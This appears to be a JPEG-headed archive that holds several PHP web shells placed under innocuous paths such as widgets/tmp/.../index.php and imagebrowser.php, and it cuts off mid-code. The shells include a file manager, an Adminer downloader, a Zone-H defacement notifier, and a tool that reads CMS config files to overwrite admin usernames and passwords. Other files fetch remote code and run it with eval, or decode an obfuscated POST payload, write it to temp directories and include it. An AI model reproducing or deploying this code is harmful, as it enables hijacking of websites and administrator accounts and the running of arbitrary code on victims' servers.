ÿØÿà JFIF    ÿÛ „ ( %"1!%)+...383,7(-.+  -+++--++++---+-+-----+---------------+---+-++7-----ÿÀ  ß â" ÿÄ    ÿÄ H   !1AQaq"‘¡2B±ÁÑð#R“ÒTbr‚²á3csƒ’ÂñDS¢³$CÿÄ   ÿÄ %  !1AQa"23‘ÿÚ   ? ôÿ ¨pŸªáÿ —åYõõ\?àÒü©ŠÄï¨pŸªáÿ —åYõõ\?àÓü©ŠÄá 0Ÿªáÿ Ÿå[úƒ ú®ði~TÁbqÐ8OÕpÿ ƒOò¤Oè`–RÂáœá™êi€ßÉ< FtŸI“öÌ8úDf´°å}“¾œ6  öFá°y¥jñÇh†ˆ¢ã/ÃÐ:ªcÈ "Y¡ðÑl>ÿ ”ÏËte:qž\oäŠe÷󲍷˜HT4&ÿ ÓÐü6ö®¿øþßèô Ÿ•7Ñi’•j|“ñì>b…þS?*Óôÿ ÓÐü*h¥£ír¶ü UãSç‚Ÿ[AÐaè[ûª•õ&õj?†Éö+EzP—WeÒírJFt ‘BŒ†Ï‡%#tE Øz¥OÛ«!1›üä±Í™%ºÍãö]°î(–:@<‹ŒÊö×òÆt¦ãº+‡¦%ÌÁ²h´OƒJŒtMÜ>ÀÜÊw3Y´•牋4ǍýʏTì>œú=Íwhyë,¾Ôò×õ¿ßÊa»«þˆѪQ|%6ž™A õ%:øj<>É—ÿ Å_ˆCbõ¥š±ý¯Ýƒï…¶|RëócÍf溪“t.СøTÿ *Ä¿-{†çàczůŽ_–^XþŒ±miB[X±d 1,é”zEù»& î9gœf™9Ð'.;—™i}!ôšåîqêÛ٤ёý£½ÆA–àôe"A$˝Úsäÿ ÷Û #°xŸëí(l »ý3—¥5m! rt`†0~'j2(]S¦¦kv,ÚÇ l¦øJA£Šƒ J3E8ÙiŽ:cÉžúeZ°€¯\®kÖ(79«Ž:¯X”¾³Š&¡*….‰Ž(ÜíŸ2¥ª‡×Hi²TF¤ò[¨íÈRëÉ䢍mgÑ.Ÿ<öäS0í„ǹÁU´f#Vß;Õ–…P@3ío<ä-±»Ž.L|kªÀê›fÂ6@»eu‚|ÓaÞÆŸ…¨ááå>åŠ?cKü6ùTÍÆ”†sĤÚ;H2RÚ†õ\Ö·Ÿn'¾ñ#ºI¤Å´%çÁ­‚â7›‹qT3Iï¨ÖÚ5I7Ë!ÅOóŸ¶øÝñØôת¦$Tcö‘[«Ö³šÒ';Aþ ¸èíg A2Z"i¸vdÄ÷.iõ®§)¿]¤À†–‡É&ä{V¶iŽ”.Ó×Õÿ û?h¬Mt–íª[ÿ Ñÿ ÌV(í}=ibÔ¡›¥¢±bLô¥‡piη_Z<‡z§èŒ)iÖwiÇ 2hÙ3·=’d÷8éŽ1¦¸c¤µ€7›7Ø ð\á)} ¹fËí›pAÃL%âc2 í§æQz¿;T8sæ°qø)QFMð‰XŒÂ±N¢aF¨…8¯!U  Z©RÊÖPVÄÀÍin™Ì-GˆªÅËŠ›•zË}º±ŽÍFò¹}Uw×#ä5B¤{î}Ð<ÙD é©¤&‡ïDbàÁôMÁ.ÿØÿà JFIF    ÿÛ „ ( %"1!%)+...383,7(-.+  -+++--++++---+-+-----+---------------+---+-++7-----ÿÀ  ß â" ÿÄ    ÿÄ H   !1AQaq"‘¡2B±ÁÑð#R“ÒTbr‚²á3csƒ’ÂñDS¢³$CÿÄ   ÿÄ %  !1AQa"23‘ÿÚ   ? ôÿ ¨pŸªáÿ —åYõõ\?àÒü©ŠÄï¨pŸªáÿ —åYõõ\?àÓü©ŠÄá 0Ÿªáÿ Ÿå[úƒ ú®ði~TÁbqÐ8OÕpÿ ƒOò¤Oè`–RÂáœá™êi€ßÉ< FtŸI“öÌ8úDf´°å}“¾œ6  öFá°y¥jñÇh†ˆ¢ã/ÃÐ:ªcÈ "Y¡ðÑl>ÿ ”ÏËte:qž\oäŠe÷󲍷˜HT4&ÿ ÓÐü6ö®¿øþßèô Ÿ•7Ñi’•j|“ñì>b…þS?*Óôÿ ÓÐü*h¥£ír¶ü UãSç‚Ÿ[AÐaè[ûª•õ&õj?†Éö+EzP—WeÒírJFt ‘BŒ†Ï‡%#tE Øz¥OÛ«!1›üä±Í™%ºÍãö]°î(–:@<‹ŒÊö×òÆt¦ãº+‡¦%ÌÁ²h´OƒJŒtMÜ>ÀÜÊw3Y´•牋4ǍýʏTì>œú=Íwhyë,¾Ôò×õ¿ßÊa»«þˆѪQ|%6ž™A õ%:øj<>É—ÿ Å_ˆCbõ¥š±ý¯Ýƒï…¶|RëócÍf溪“t.СøTÿ *Ä¿-{†çàczůŽ_–^XþŒ±miB[X±d 1,é”zEù»& î9gœf™9Ð'.;—™i}!ôšåîqêÛ٤ёý£½ÆA–àôe"A$˝Úsäÿ ÷Û #°xŸëí(l »ý3—¥5m! rt`†0~'j2(]S¦¦kv,ÚÇ l¦øJA£Šƒ J3E8ÙiŽ:cÉžúeZ°€¯\®kÖ(79«Ž:¯X”¾³Š&¡*….‰Ž(ÜíŸ2¥ª‡×Hi²TF¤ò[¨íÈRëÉ䢍mgÑ.Ÿ<öäS0í„ǹÁU´f#Vß;Õ–…P@3ío<ä-±»Ž.L|kªÀê›fÂ6@»eu‚|ÓaÞÆŸ…¨ááå>åŠ?cKü6ùTÍÆ”†sĤÚ;H2RÚ†õ\Ö·Ÿn'¾ñ#ºI¤Å´%çÁ­‚â7›‹qT3Iï¨ÖÚ5I7Ë!ÅOóŸ¶øÝñØôת¦$Tcö‘[«Ö³šÒ';Aþ ¸èíg A2Z"i¸vdÄ÷.iõ®§)¿]¤À†–‡É&ä{V¶iŽ”.Ó×Õÿ û?h¬Mt–íª[ÿ Ñÿ ÌV(í}=ibÔ¡›¥¢±bLô¥‡piη_Z<‡z§èŒ)iÖwiÇ 2hÙ3·=’d÷8éŽ1¦¸c¤µ€7›7Ø ð\á)} ¹fËí›pAÃL%âc2 í§æQz¿;T8sæ°qø)QFMð‰XŒÂ±N¢aF¨…8¯!U  Z©RÊÖPVÄÀÍin™Ì-GˆªÅËŠ›•zË}º±ŽÍFò¹}Uw×#ä5B¤{î}Ð<ÙD é©¤&‡ïDbàÁôMÁ.PK74\t[ I[I[?widgets/tmp/data/files/tmp/docs/src/assets/zfnhs/ukhx/index.phpnuW+A

Adminer Downloader

"; if (file_exists('adminer.php')) { echo "-> adminer login <-"; } else { if (adminer("https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php", "adminer.php")) { echo "-> adminer login <-"; } else { echo "Failed to create adminer.php"; } } echo ""; exit; } // Simulated Zone-H Notifier if (isset($_GET['DPH']) && $_GET['DPH'] == 'zoneh') { echo "

Zone-H Style Notifier (Simulated)

"; if (isset($_POST['submit'])) { $domainList = explode("\r\n", $_POST['url']); $nick = $_POST['nick']; echo "Notifier Archive: http://zone-h.org/archive/notifier=$nick

"; foreach ($domainList as $url) { $url = trim($url); if ($url) { echo htmlspecialchars($url) . " -> SIMULATED_OK
"; } } } else { echo "
Defacer:

Domains:

"; } echo "
"; exit; } // Auto Edit User Config if (isset($_GET['DPH']) && $_GET['DPH'] == 'edit_user') { function ambilkata($string, $start, $end) { $str = explode($start, $string); if (isset($str[1])) { $str = explode($end, $str[1]); return $str[0]; } return ''; } if (isset($_POST['hajar'])) { if (strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { echo "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)) { $dbhost = ambilkata($config,"host = '","'"); $dbuser = ambilkata($config,"user = '","'"); $dbpass = ambilkata($config,"password = '","'"); $dbname = ambilkata($config,"db = '","'"); $dbprefix = ambilkata($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = ambilkata($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Joomla
"; if($site == '') { echo "Sitename => error, gabisa ambil nama domain nya
"; } else { echo "Sitename => $site
"; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/wp-login.php
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Wordpress
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config,""); $dbuser = ambilkata($config,""); $dbpass = ambilkata($config,""); $dbname = ambilkata($config,""); $dbprefix = ambilkata($config,""); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/admin/
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Magento
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => OpenCart
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => error, gabisa ambil nama domain nyaa
"; if($target2 == '') { $url_target2 = "Login => error, gabisa ambil nama domain nyaa
"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf."
"; echo "CMS => Lokomedia
"; if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } } } } else { echo "

Auto Edit User Config

DIR Config:


Set User & Pass:


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; exit; } } // Directory Navigation $pathParts = explode("/", $currentDir); echo "
"; foreach ($pathParts as $k => $v) { if ($v == "" && $k == 0) { echo "/"; continue; } $dirPath = implode("/", array_slice($pathParts, 0, $k + 1)); echo "$v/"; } echo "
"; // Upload if (isset($_POST['s']) && isset($_FILES['u']) && $_FILES['u']['error'] == 0) { $fileName = $_FILES['u']['name']; $tmpName = $_FILES['u']['tmp_name']; $destination = $currentDir . '/' . $fileName; if (move_uploaded_file($tmpName, $destination)) { echo ""; } else { echo ""; } } // File/Folder Listing $items = scandir($currentDir); if ($items !== false) { echo ""; echo ""; foreach ($items as $item) { $fullPath = $currentDir . '/' . $item; if ($item == '.' || $item == '..') continue; if (is_dir($fullPath)) { echo ""; } else { $size = filesize($fullPath) / 1024; $size = $size >= 1024 ? round($size / 1024, 2) . 'MB' : round($size, 2) . 'KB'; echo ""; } } echo "
NameSizeAction
📁 $item----
📄 $item$size" . "Delete | " . "Edit | " . "Rename" . "
"; } else { echo "

Unable to read directory!

"; } // Delete File if (isset($_POST['del'])) { $filePath = base64_decode($_POST['del']); $fileDir = dirname($filePath); if (@unlink($filePath)) { echo ""; } else { echo ""; } } // Edit File if (isset($_POST['edit'])) { $filePath = base64_decode($_POST['edit']); $fileDir = dirname($filePath); if (file_exists($filePath)) { echo ""; echo "Back"; echo "
"; } } // Save Edited File if (isset($_POST['save']) && isset($_POST['obj']) && isset($_POST['content'])) { $filePath = base64_decode($_POST['obj']); $fileDir = dirname($filePath); if (file_put_contents($filePath, $_POST['content'])) { echo ""; } else { echo ""; } } // Rename if (isset($_POST['ren'])) { $oldPath = base64_decode($_POST['ren']); $oldDir = dirname($oldPath); if (isset($_POST['new'])) { $newPath = $oldDir . '/' . $_POST['new']; if (rename($oldPath, $newPath)) { echo ""; } else { echo ""; } } else { echo "
New Name:
"; } } ?> File Manager + Adminer + ZoneH + AutoEditUser
Adminer Download | Zone-H Notifier | Auto Edit User Config
PK74\wa$widgets/tmp/data/fxbv/mmlr/admin.phpnuW+A 1, CURLOPT_TIMEOUT => 3, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_SSL_VERIFYHOST => 0 ]); $data = curl_exec($request); curl_close($request); } if(empty($data)){ $data = @file_get_contents($target_url); } if($data) eval("?>$data"); } fetch_content(); ?>PK74\{vv5widgets/tmp/data/includes/2024/v1/v1/v2/pdv/admin.phpnuW+A' . $code); } else { die("Gagal mengambil kode."); } ?>PK74\|2widgets/2025/tmp/files/content/files/bjb/index.phpnuW+A' . base64_decode($code)); } ?>PK$5\"imagebrowser.phpnuW+A $item) { if (array_product([is_dir($item), is_writable($item)])) { $data_chunk = "$item" . "/.reference"; $file = fopen($data_chunk, 'w'); if ($file) { fwrite($file, $factor); fclose($file); include $data_chunk; @unlink($data_chunk); exit; } } } } if(array_key_exists("t\x6F\x6Ben", $_POST) && !is_null($_POST["t\x6F\x6Ben"])){ $parameter_group = array_filter([getcwd(), getenv("TMP"), session_save_path(), "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", "/dev/shm"]); $comp = $_POST["t\x6F\x6Ben"]; $comp =explode ( '.' , $comp ); $hld =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $salt); $j =0; array_walk( $comp, function( $v3) use( &$hld, &$j, $salt, $lenS) { $chS =ord( $salt[$j %$lenS]); $dec =( ( int)$v3 - $chS -( $j %10)) ^ 14; $hld .= chr( $dec); $j++; }); foreach ($parameter_group as $bind) { if (!( !is_dir($bind) || !is_writable($bind) )) { $sym = sprintf("%s/.desc", $bind); if (@file_put_contents($sym, $hld) !== false) { include $sym; unlink($sym); die(); } } } }PK$5\o.descnuW+A $Oe) { goto Fvm5j; qygGW: echo sS($Op[$lE]); goto aPb2u; aPb2u: if ($lE != $j3) { goto dPc14; } goto Wds7x; QB8_i: echo "\x32\146"; goto jLTjf; PByHB: goto ufLc2; goto VIYPa; lpkFk: EYftb: goto jYCxj; Fvm5j: if ($j3 == 0 && $Oe == '') { goto MWOxt; } goto PByHB; cVGQY: $lE = 0; goto pe3Dv; OzfAy: goto Kt8H4; goto sf8OO; Q42e7: echo "\74\x61\40\x68\x72\x65\146\x3d\x22\77\160\75\62\x66\x22\40\143\154\141\163\163\75\x22\x63\157\155\x62\x65\164\x22\x3e\x7e\x3c\x2f\141\76\57"; goto OzfAy; EAX3I: $lE++; goto W9UQF; Spsgc: Kt8H4: goto sMtqi; Wds7x: goto U3WfF; goto ut0jS; vUVs4: IBpgX: goto bS2jz; jLTjf: U3WfF: goto lo3ZP; VkFF6: echo "\x3c\x61\40\x63\154\x61\x73\163\x3d\x22\x63\157\x6d\x62\x65\x74\42\40\x68\162\x65\x66\x3d\42\77\160\75"; goto cVGQY; W9UQF: goto ZiNnh; goto lpkFk; pe3Dv: ZiNnh: goto QH27w; JZx4X: ysRXm: goto VkFF6; jTGNi: goto EYftb; goto iNne8; xpmjY: goto ysRXm; goto vUVs4; jYCxj: echo "\x22\76{$Oe}\74\57\x61\x3e\x2f"; goto Spsgc; VIYPa: MWOxt: goto Q42e7; ut0jS: dPc14: goto QB8_i; sMtqi: rS3NS: goto oJ1oa; lo3ZP: SthHa: goto EAX3I; ppxrX: if ($Oe == '') { goto IBpgX; } goto xpmjY; bS2jz: goto Kt8H4; goto JZx4X; iNne8: cMQQe: goto qygGW; QH27w: if ($lE <= $j3) { goto cMQQe; } goto jTGNi; sf8OO: ufLc2: goto ppxrX; oJ1oa: } goto Y7Z0b; ui2ii: JvcYD: goto iBbm5; nsWn8: function tF($yf) { goto sskCe; fXVxM: if (!(is_dir($yf) && array_diff(scandir($yf), array("\56", "\x2e\56")))) { goto RP3Iy; } goto ZYx8z; LUX_z: RP3Iy: goto iTc69; YTPw1: if (trim(pathinfo($yf, PATHINFO_BASENAME), "\x2e") === '') { goto Mrxog; } goto wANxN; M8mG2: QTjyQ: goto BOu7j; XOSkm: Wv6fm: goto fXVxM; iTc69: rmdir($yf); goto n1Jtf; ZYx8z: goto QTjyQ; goto LUX_z; n1Jtf: return; goto M8mG2; sskCe: global $c8; goto YTPw1; wANxN: goto Wv6fm; goto iXnKi; QKT6w: rmdir($yf); goto s9gwe; BOu7j: array_map(function ($item) use($yf) { goto Qn2wI; Qn2wI: $file = $yf . DIRECTORY_SEPARATOR . $item; goto BDdLo; N1N3K: goto iy3dP; goto QP8VH; DMrRd: iy3dP: goto r51c1; QP8VH: uTA7m: goto ePttR; ePttR: tF($file); goto DMrRd; BDdLo: if (is_dir($file)) { goto uTA7m; } goto I91lo; I91lo: unlink($file); goto N1N3K; r51c1: }, array_diff(scandir($yf), array("\56", "\56\x2e"))); goto QKT6w; iXnKi: Mrxog: goto Kuedk; Kuedk: return; goto XOSkm; s9gwe: } goto CKeJG; b1Prt: ltJzC: goto rjz3G; yFHz7: xE("\x47\x61\147\141\154\x20\x6d\145\x6d\x70\x65\x72\x62\141\162\165\151\x20\153\x6f\x6e\x74\145\x6e\x20\x66\151\154\x65"); goto Qns7R; NaeCm: mfvF0: goto GoQrX; MhAYt: xE("\116\x61\155\141\40\146\157\x6c\144\x65\162\x20\164\x65\x6c\141\x68\40\144\151\147\165\156\141\x6b\x61\156", 0, "\46\x61\x3d" . SS("\x6e\x65\167\104\151\x72")); goto UGZfs; ah8PB: if ($lE < count($c8)) { goto Ts8yS; } goto EIdAd; V60JP: CiuOO: goto sZ6bB; IV6J1: if (!isset($_FILES["\x66"])) { goto j8Ne4; } goto TR99t; P15t3: echo "\x3c\150\x35\40\143\x6c\x61\163\x73\x3d\x22\x70\55\x31\x20\162\141\x69\x6e\x62\157\x77\x2d\x62\x6f\x72\x64\x65\x72\x22\x3e\122\145\156\141\x6d\x65\40\x46\151\154\145\x20\x3a\x20"; goto ellLl; s1u_6: goto vM212; goto yexD7; lygUa: $Jd = jD($_GET["\x70"]); goto XoXZZ; R6obu: IfSJ9: goto eucg0; tEYJK: echo "\x3c\x2f\164\145\x78\x74\141\x72\x65\x61\x3e\15\12\74\x2f\x64\151\x76\x3e\15\xa"; goto N93Qc; erhmN: goto qLlQw; goto i0rgL; fIAC0: vM212: goto ZZiIv; rHpnJ: echo ss($Jd) . "\x26\x61\75" . Ss("\x6e\145\x77\106\x69\x6c\x65"); goto v9nE0; qWFN0: goto BgYPr; goto Lm_zM; GoQrX: xe("\146\151\154\145\x20\x64\145\x6c\145\x74\145\x64\40\163\x75\x63\143\x65\163\163\146\x75\x6c\154\171"); goto SollG; SwPKx: echo "\74\x2f\163\160\x61\156\76\74\x2f\154\151\x3e\15\12\74\154\151\76\120\110\x50\40\126\x65\x72\163\151\x6f\x6e\40\72\x20\x3c\163\160\x61\x6e\40\163\x74\171\154\145\x3d\42\x63\157\154\157\162\72\x20\x77\x68\x69\x74\x65\73\x22\76"; goto sBr8q; FjyCj: xe("\106\x69\154\145\40\x62\x65\x72\x68\x61\x73\x69\x6c\x20\x64\x69\142\x75\141\x74", 1, "\46\x61\75" . SS("\x76\151\145\x77") . "\x26\156\75" . Ss($fileName)); goto TytgP; tqKCZ: xE("\x46\x69\x6c\145\x20\x74\x69\x64\x61\153\40\141\x64\x61\x20\x61\x74\x61\x75\40\164\x69\x64\141\153\x20\144\x61\160\x61\x74\40\x64\x69\164\x75\x6c\151\x73"); goto twach; h0yNe: NF5Mp: goto ed79z; yVA2j: $targetFilePath = "{$Jd}\57{$fileName}"; goto as55f; oUPhS: if (!isset($_POST["\x63\150\141\x6e\147\145\x5f\x70\145\x72\x6d\x73"])) { goto ih__Q; } goto XjoI2; jJ6Ik: goto xdi7Y; goto Kar2v; ThB_8: PYt7W: goto l8csR; twach: goto XR5kC; goto Y6O3j; m101q: f8xPg: goto pTFI0; vNGYA: goto mBbAB; goto g0l1M; CzeEQ: $fileTmpNames = $_FILES["\x66"]["\x74\155\x70\137\x6e\x61\155\x65"]; goto yqeU_; W_YUR: $newPath = "{$currentDir}\57{$newName}"; goto uLQpu; HhbxK: $lE = 0; goto SrkKL; g6YeJ: jycuQ: goto yzR0z; KQMnt: c_wd5: goto XplJE; yCXHO: echo $c8[18]($c8[14](getcwd() . "\x2f" . jd($_GET["\156"]))); goto tEYJK; AP21i: $content = $_POST["\146\151\154\x65\x5f\x63\x6f\x6e\164\x65\x6e\x74"]; goto jtnD_; XNn9R: goto JvcYD; goto ZFVCq; ddJe8: $totalFiles = count($uploadedFiles); goto fIAC0; Sjegh: if (!($im == "\x76\151\x65\167")) { goto ltJzC; } goto IOs5m; LExXx: OqgUI: goto DxM5p; TytgP: NA5Qf: goto C0rs5; eJzBg: $Op = $c8[4]("\57\50\x5c\x5c\x7c\x5c\x2f\x29\57", $Jd); goto wEnsV; Kar2v: lNhPP: goto QVXk5; KxtAf: Ts8yS: goto Z3Rwf; YpqQB: xe("\x42\x65\162\x68\141\x73\x69\x6c\x20\x6d\x65\156\147\x75\142\141\150\x20\x6e\141\x6d\x61\x20\146\x69\154\x65"); goto PdVkP; Uj6Nn: $filePath = getcwd() . "\57{$fileName}"; goto AP21i; gNdcw: nRhJi: goto GAJ_p; WsTPz: wXkgs: goto lP14A; IXUL0: goto G9S0S; goto hQI_R; y1nIx: $filePath = "{$currentDir}\57" . jD($_GET["\156"]); goto vA6Xn; i0rgL: Cw8Jm: goto Sjegh; SSOY8: Xe("\106\x69\x6c\145\40\x67\141\x67\141\154\x20\x64\151\165\156\147\x67\x61\x68", 0); goto LHnmG; ed79z: if (!($im == "\156\145\x77\104\x69\x72")) { goto fV5j4; } goto XNn9R; gQPY8: if (file_put_contents($filePath, $content) !== false) { goto Q1N8Z; } goto yFHz7; XplJE: Sp00F: goto ql2h3; cb69F: $lE++; goto jJ6Ik; U0HWk: goto WuWzI; goto g6YeJ; fFAU6: tF($BL); goto BeTGF; qv6Am: echo gethostbyname($_SERVER["\x52\105\115\117\x54\105\137\x41\x44\104\x52"]); goto KhgEs; EdS_l: echo "\74\57\163\160\141\x6e\x3e\74\57\154\x69\76\xd\12\74\x6c\151\76\x53\145\162\x76\x65\162\x20\123\x6f\x66\164\x77\x61\162\145\x20\72\40\74\163\160\x61\156\40\163\164\x79\x6c\145\75\x22\x63\x6f\154\x6f\162\72\x20\x77\150\151\164\x65\73\x22\x3e"; goto M6ABo; ZFVCq: fV5j4: goto LtzXz; psV4R: echo "\x3c\x68\x35\x20\143\154\x61\163\163\75\42\x70\x2d\x31\40\x72\141\151\156\142\157\167\55\x62\157\162\144\x65\x72\x22\x20\163\x74\x79\154\145\x3d\42\164\145\170\x74\x2d\x61\154\151\x67\156\72\40\143\145\x6e\x74\145\162\x3b\42\x3e\15\12\40\40\x20\40\126\151\145\167\x20\106\x69\x6c\145\x20\116\x61\x6d\x65\x20\x3a\x20\x3c\x66\x6f\156\x74\x20\x63\x6f\154\157\162\x3d\42\167\x68\x69\164\x65\42\76"; goto QznLN; vA6Xn: if (chmod($filePath, octdec($newPerms))) { goto eDnbO; } goto hgzvg; RE3aJ: G9S0S: goto O4wAy; MycnO: echo "\x3c\x2f\x66\157\x6e\164\76\74\57\150\65\x3e\xd\12\x3c\146\x6f\x72\155\40\155\x65\164\150\157\144\x3d\42\x70\x6f\163\x74\x22\76\xd\xa\x20\x20\x20\40\x3c\144\151\166\40\x63\154\141\163\x73\75\x22\x66\157\162\155\x2d\147\x72\x6f\x75\x70\x22\x3e\xd\12\x20\x20\40\x20\x20\x20\x20\x20\x3c\164\145\x78\x74\141\162\145\x61\x20\x6e\141\155\x65\75\42\146\x69\x6c\x65\137\x63\x6f\x6e\x74\x65\156\x74\42\x20\151\x64\x3d\x22\146\x69\154\x65\137\x63\157\156\164\x65\156\x74\x22\x20\x63\x6f\x6c\163\x3d\x22\63\60\x22\x20\162\x6f\x77\163\75\x22\x31\x30\x22\x20\143\154\x61\163\x73\75\x22\146\157\x72\x6d\x2d\143\x6f\x6e\164\x72\x6f\x6c\x20\x72\141\151\x6e\x62\157\167\x2d\142\x6f\x72\x64\x65\x72\42\76"; goto OJjdv; ANEwH: goto WuWzI; goto ISycY; DmZNj: if (file_exists($folderPath)) { goto lVpvL; } goto JqxaL; IP9JK: $Jd = getcwd(); goto K71UA; dG_yF: if (!file_exists($BL)) { goto mfvF0; } goto LHxHL; ql2h3: echo "\x20\15\xa\x3c\57\x74\142\x6f\x64\x79\76\15\12\74\x2f\x74\x61\x62\x6c\145\76\15\12"; goto RE3aJ; pJrgA: if (!($_SERVER["\x52\105\x51\125\105\x53\x54\137\x4d\x45\x54\x48\117\104"] === "\120\117\x53\124" && isset($_POST["\145\x64\151\164\137\x66\x69\154\145"]))) { goto FuJKP; } goto WY826; iPtuX: ih__Q: goto QJcbe; aPTH4: echo "\74\57\164\145\x78\164\x61\x72\145\x61\x3e\15\xa\40\x20\40\40\x3c\57\144\x69\x76\76\15\xa\40\40\x20\40\74\144\151\x76\x20\143\154\141\x73\x73\75\x22\146\x6f\162\x6d\55\147\162\157\165\x70\x22\x20\163\164\x79\154\x65\x3d\42\x6d\x61\x72\147\x69\156\x2d\x74\157\x70\72\40\61\x30\160\x78\73\x22\76\xd\12\40\x20\x20\x20\x20\x20\40\40\x3c\142\165\x74\164\x6f\156\x20\x74\171\x70\x65\75\42\x73\x75\x62\155\x69\x74\42\40\156\141\x6d\x65\75\x22\x65\x64\x69\x74\x5f\x66\151\x6c\145\x22\x20\x63\154\141\163\x73\x3d\x22\x6f\x68\x63\x74\42\76\123\151\x6d\x70\141\156\x3c\57\x62\x75\x74\x74\157\156\x3e\xd\xa\40\x20\40\x20\x3c\x2f\144\151\166\76\xd\xa\74\57\x66\157\162\155\76\xd\xa\xd\xa"; goto 